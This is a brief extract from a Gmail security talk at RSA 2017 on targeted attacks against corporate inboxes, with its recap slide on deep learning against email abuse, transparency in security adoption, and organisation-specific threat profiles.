![Page 87: Targeted Attacks Against Corporate Inboxes - a Gmail Perspective RSA 2017](https://reader034.vdocument.in/reader034/viewer/2022050613/58abe4f51a28ab212a8b700f/html5/thumbnails/87.jpg)
g.co/research/protect
Recap
Deep-learning is providing the edge we need to combat email abuse
Transparency helps driving adoption of security technologies through the eco-system
Each organization has a unique threat profile that should be considered when prioritizing defenses
![Page 89: Targeted Attacks Against Corporate Inboxes - a Gmail Perspective RSA 2017](https://reader034.vdocument.in/reader034/viewer/2022050613/58abe4f51a28ab212a8b700f/html5/thumbnails/89.jpg)
Thanks g.co/research/protect